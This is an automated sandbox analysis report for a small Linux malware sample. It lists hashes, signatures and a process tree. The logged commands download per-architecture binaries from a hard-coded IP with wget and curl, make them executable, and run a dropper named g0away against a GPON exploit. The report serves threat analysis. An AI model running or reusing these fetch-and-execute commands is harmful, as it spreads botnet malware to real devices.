Analysis
-
max time kernel
80s -
max time network
128s -
platform
ubuntu-18.04_amd64 -
resource
ubuntu1804-amd64-20240729-en -
resource tags
arch:amd64arch:i386image:ubuntu1804-amd64-20240729-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system -
submitted
28-07-2024 16:40
Static task
static1
Behavioral task
behavioral1
Sample
17f41b4b65e5ddad4a76594560d43927_JaffaCakes118
Resource
ubuntu1804-amd64-20240729-en
Behavioral task
behavioral2
Sample
17f41b4b65e5ddad4a76594560d43927_JaffaCakes118
Resource
debian9-armhf-20240729-en
Behavioral task
behavioral3
Sample
17f41b4b65e5ddad4a76594560d43927_JaffaCakes118
Resource
debian9-mipsbe-20240729-en
Behavioral task
behavioral4
Sample
17f41b4b65e5ddad4a76594560d43927_JaffaCakes118
Resource
debian9-mipsel-20240729-en
General
-
Target
17f41b4b65e5ddad4a76594560d43927_JaffaCakes118
-
Size
3KB
-
MD5
17f41b4b65e5ddad4a76594560d43927
-
SHA1
bb7691396c850ff2b4645b90336852650aa26eb6
-
SHA256
36c3310e8853358d2d68f7b1f0ebd3b52f9691f58286799d1a7b9413903d5588
-
SHA512
602d2b3fda5948c263ab2c48f96993daf5ef404faec82cb2e7f55eae7c8dbed3525b6715f537629d7299c3f4e43077bcf1429b81375e7b2e16f398768920b322
Malware Config
Signatures
-
Executes dropped EXE 13 IoCs
Processes:
g0awayg0awayg0awayg0awayg0awayg0awayg0awayg0awayg0awayg0awayg0awayg0awayg0awayioc pid process /tmp/g0away 1510 g0away /tmp/g0away 1516 g0away /tmp/g0away 1522 g0away /tmp/g0away 1528 g0away /tmp/g0away 1536 g0away /tmp/g0away 1542 g0away /tmp/g0away 1548 g0away /tmp/g0away 1554 g0away /tmp/g0away 1560 g0away /tmp/g0away 1566 g0away /tmp/g0away 1572 g0away /tmp/g0away 1578 g0away /tmp/g0away 1584 g0away -
Writes file to tmp directory 1 IoCs
Malware often drops required files in the /tmp directory.
Processes:
17f41b4b65e5ddad4a76594560d43927_JaffaCakes118description ioc process File opened for modification /tmp/g0away 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118
Processes
-
/tmp/17f41b4b65e5ddad4a76594560d43927_JaffaCakes118/tmp/17f41b4b65e5ddad4a76594560d43927_JaffaCakes1181⤵
- Writes file to tmp directory
PID:1502 -
/usr/bin/wgetwget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.x862⤵PID:1503
-
/usr/bin/curlcurl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.x862⤵PID:1507
-
/bin/catcat m3th.x862⤵PID:1508
-
/bin/chmodchmod +x 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 config-err-QezUlM g0away netplan_qoa392vr snap-private-tmp ssh-XFSPus0dWfPx systemd-private-dc6a883fb225443bbffe00d790a45ac8-bolt.service-ewcsAx systemd-private-dc6a883fb225443bbffe00d790a45ac8-colord.service-opzQ5B systemd-private-dc6a883fb225443bbffe00d790a45ac8-ModemManager.service-qeifPW systemd-private-dc6a883fb225443bbffe00d790a45ac8-systemd-resolved.service-mvNHja systemd-private-dc6a883fb225443bbffe00d790a45ac8-systemd-timedated.service-YpXBgT2⤵PID:1509
-
/tmp/g0away./g0away gpon8080.exploit2⤵
- Executes dropped EXE
PID:1510 -
/usr/bin/wgetwget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.mips2⤵PID:1512
-
/usr/bin/curlcurl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.mips2⤵PID:1513
-
/bin/catcat m3th.mips2⤵PID:1514
-
/bin/chmodchmod +x 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 config-err-QezUlM g0away netplan_qoa392vr snap-private-tmp ssh-XFSPus0dWfPx systemd-private-dc6a883fb225443bbffe00d790a45ac8-bolt.service-ewcsAx systemd-private-dc6a883fb225443bbffe00d790a45ac8-colord.service-opzQ5B systemd-private-dc6a883fb225443bbffe00d790a45ac8-ModemManager.service-qeifPW systemd-private-dc6a883fb225443bbffe00d790a45ac8-systemd-resolved.service-mvNHja systemd-private-dc6a883fb225443bbffe00d790a45ac8-systemd-timedated.service-YpXBgT2⤵PID:1515
-
/tmp/g0away./g0away gpon8080.exploit2⤵
- Executes dropped EXE
PID:1516 -
/usr/bin/wgetwget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.mpsl2⤵PID:1518
-
/usr/bin/curlcurl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.mpsl2⤵PID:1519
-
/bin/catcat m3th.mpsl2⤵PID:1520
-
/bin/chmodchmod +x 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 config-err-QezUlM g0away netplan_qoa392vr snap-private-tmp ssh-XFSPus0dWfPx systemd-private-dc6a883fb225443bbffe00d790a45ac8-bolt.service-ewcsAx systemd-private-dc6a883fb225443bbffe00d790a45ac8-colord.service-opzQ5B systemd-private-dc6a883fb225443bbffe00d790a45ac8-ModemManager.service-qeifPW systemd-private-dc6a883fb225443bbffe00d790a45ac8-systemd-resolved.service-mvNHja systemd-private-dc6a883fb225443bbffe00d790a45ac8-systemd-timedated.service-YpXBgT2⤵PID:1521
-
/tmp/g0away./g0away gpon8080.exploit2⤵
- Executes dropped EXE
PID:1522 -
/usr/bin/wgetwget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.arm2⤵PID:1524
-
/usr/bin/curlcurl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.arm2⤵PID:1525
-
/bin/catcat m3th.arm2⤵PID:1526
-
/bin/chmodchmod +x 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 config-err-QezUlM g0away netplan_qoa392vr snap-private-tmp ssh-XFSPus0dWfPx systemd-private-dc6a883fb225443bbffe00d790a45ac8-bolt.service-ewcsAx systemd-private-dc6a883fb225443bbffe00d790a45ac8-colord.service-opzQ5B systemd-private-dc6a883fb225443bbffe00d790a45ac8-ModemManager.service-qeifPW systemd-private-dc6a883fb225443bbffe00d790a45ac8-systemd-resolved.service-mvNHja systemd-private-dc6a883fb225443bbffe00d790a45ac8-systemd-timedated.service-YpXBgT2⤵PID:1527
-
/tmp/g0away./g0away gpon8080.exploit2⤵
- Executes dropped EXE
PID:1528 -
/usr/bin/wgetwget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.arm52⤵PID:1530
-
/usr/bin/curlcurl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.arm52⤵PID:1531
-
/bin/catcat m3th.arm52⤵PID:1534
-
/bin/chmodchmod +x 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 config-err-QezUlM g0away netplan_qoa392vr snap-private-tmp ssh-XFSPus0dWfPx systemd-private-dc6a883fb225443bbffe00d790a45ac8-bolt.service-ewcsAx systemd-private-dc6a883fb225443bbffe00d790a45ac8-colord.service-opzQ5B systemd-private-dc6a883fb225443bbffe00d790a45ac8-ModemManager.service-qeifPW systemd-private-dc6a883fb225443bbffe00d790a45ac8-systemd-resolved.service-mvNHja2⤵PID:1535
-
/tmp/g0away./g0away gpon8080.exploit2⤵
- Executes dropped EXE
PID:1536 -
/usr/bin/wgetwget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.arm62⤵PID:1538
-
/usr/bin/curlcurl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.arm62⤵PID:1539
-
/bin/catcat m3th.arm62⤵PID:1540
-
/bin/chmodchmod +x 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 config-err-QezUlM g0away netplan_qoa392vr snap-private-tmp ssh-XFSPus0dWfPx systemd-private-dc6a883fb225443bbffe00d790a45ac8-bolt.service-ewcsAx systemd-private-dc6a883fb225443bbffe00d790a45ac8-colord.service-opzQ5B systemd-private-dc6a883fb225443bbffe00d790a45ac8-ModemManager.service-qeifPW systemd-private-dc6a883fb225443bbffe00d790a45ac8-systemd-resolved.service-mvNHja2⤵PID:1541
-
/tmp/g0away./g0away gpon8080.exploit2⤵
- Executes dropped EXE
PID:1542 -
/usr/bin/wgetwget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.arm72⤵PID:1544
-
/usr/bin/curlcurl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.arm72⤵PID:1545
-
/bin/catcat m3th.arm72⤵PID:1546
-
/bin/chmodchmod +x 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 config-err-QezUlM g0away netplan_qoa392vr snap-private-tmp ssh-XFSPus0dWfPx systemd-private-dc6a883fb225443bbffe00d790a45ac8-bolt.service-ewcsAx systemd-private-dc6a883fb225443bbffe00d790a45ac8-colord.service-opzQ5B systemd-private-dc6a883fb225443bbffe00d790a45ac8-ModemManager.service-qeifPW systemd-private-dc6a883fb225443bbffe00d790a45ac8-systemd-resolved.service-mvNHja2⤵PID:1547
-
/tmp/g0away./g0away gpon8080.exploit2⤵
- Executes dropped EXE
PID:1548 -
/usr/bin/wgetwget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.ppc2⤵PID:1550
-
/usr/bin/curlcurl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.ppc2⤵PID:1551
-
/bin/catcat m3th.ppc2⤵PID:1552
-
/bin/chmodchmod +x 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 config-err-QezUlM g0away netplan_qoa392vr snap-private-tmp ssh-XFSPus0dWfPx systemd-private-dc6a883fb225443bbffe00d790a45ac8-bolt.service-ewcsAx systemd-private-dc6a883fb225443bbffe00d790a45ac8-colord.service-opzQ5B systemd-private-dc6a883fb225443bbffe00d790a45ac8-ModemManager.service-qeifPW systemd-private-dc6a883fb225443bbffe00d790a45ac8-systemd-resolved.service-mvNHja2⤵PID:1553
-
/tmp/g0away./g0away gpon8080.exploit2⤵
- Executes dropped EXE
PID:1554 -
/usr/bin/wgetwget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.m68k2⤵PID:1556
-
/usr/bin/curlcurl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.m68k2⤵PID:1557
-
/bin/catcat m3th.m68k2⤵PID:1558
-
/bin/chmodchmod +x 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 config-err-QezUlM g0away netplan_qoa392vr snap-private-tmp ssh-XFSPus0dWfPx systemd-private-dc6a883fb225443bbffe00d790a45ac8-bolt.service-ewcsAx systemd-private-dc6a883fb225443bbffe00d790a45ac8-colord.service-opzQ5B systemd-private-dc6a883fb225443bbffe00d790a45ac8-ModemManager.service-qeifPW systemd-private-dc6a883fb225443bbffe00d790a45ac8-systemd-resolved.service-mvNHja2⤵PID:1559
-
/tmp/g0away./g0away gpon8080.exploit2⤵
- Executes dropped EXE
PID:1560 -
/usr/bin/wgetwget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.spc2⤵PID:1562
-
/usr/bin/curlcurl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.spc2⤵PID:1563
-
/bin/catcat m3th.spc2⤵PID:1564
-
/bin/chmodchmod +x 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 config-err-QezUlM g0away netplan_qoa392vr snap-private-tmp ssh-XFSPus0dWfPx systemd-private-dc6a883fb225443bbffe00d790a45ac8-bolt.service-ewcsAx systemd-private-dc6a883fb225443bbffe00d790a45ac8-colord.service-opzQ5B systemd-private-dc6a883fb225443bbffe00d790a45ac8-ModemManager.service-qeifPW systemd-private-dc6a883fb225443bbffe00d790a45ac8-systemd-resolved.service-mvNHja2⤵PID:1565
-
/tmp/g0away./g0away gpon8080.exploit2⤵
- Executes dropped EXE
PID:1566 -
/usr/bin/wgetwget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.i6862⤵PID:1568
-
/usr/bin/curlcurl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.i6862⤵PID:1569
-
/bin/catcat m3th.i6862⤵PID:1570
-
/bin/chmodchmod +x 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 config-err-QezUlM g0away netplan_qoa392vr snap-private-tmp ssh-XFSPus0dWfPx systemd-private-dc6a883fb225443bbffe00d790a45ac8-bolt.service-ewcsAx systemd-private-dc6a883fb225443bbffe00d790a45ac8-colord.service-opzQ5B systemd-private-dc6a883fb225443bbffe00d790a45ac8-ModemManager.service-qeifPW systemd-private-dc6a883fb225443bbffe00d790a45ac8-systemd-resolved.service-mvNHja2⤵PID:1571
-
/tmp/g0away./g0away gpon8080.exploit2⤵
- Executes dropped EXE
PID:1572 -
/usr/bin/wgetwget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.sh42⤵PID:1574
-
/usr/bin/curlcurl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.sh42⤵PID:1575
-
/bin/catcat m3th.sh42⤵PID:1576
-
/bin/chmodchmod +x 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 config-err-QezUlM g0away netplan_qoa392vr snap-private-tmp ssh-XFSPus0dWfPx systemd-private-dc6a883fb225443bbffe00d790a45ac8-bolt.service-ewcsAx systemd-private-dc6a883fb225443bbffe00d790a45ac8-colord.service-opzQ5B systemd-private-dc6a883fb225443bbffe00d790a45ac8-ModemManager.service-qeifPW systemd-private-dc6a883fb225443bbffe00d790a45ac8-systemd-resolved.service-mvNHja2⤵PID:1577
-
/tmp/g0away./g0away gpon8080.exploit2⤵
- Executes dropped EXE
PID:1578 -
/usr/bin/wgetwget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.arc2⤵PID:1580
-
/usr/bin/curlcurl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.arc2⤵PID:1581
-
/bin/catcat m3th.arc2⤵PID:1582
-
/bin/chmodchmod +x 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 config-err-QezUlM g0away netplan_qoa392vr snap-private-tmp ssh-XFSPus0dWfPx systemd-private-dc6a883fb225443bbffe00d790a45ac8-bolt.service-ewcsAx systemd-private-dc6a883fb225443bbffe00d790a45ac8-colord.service-opzQ5B systemd-private-dc6a883fb225443bbffe00d790a45ac8-ModemManager.service-qeifPW systemd-private-dc6a883fb225443bbffe00d790a45ac8-systemd-resolved.service-mvNHja2⤵PID:1583
-
/tmp/g0away./g0away gpon8080.exploit2⤵
- Executes dropped EXE
PID:1584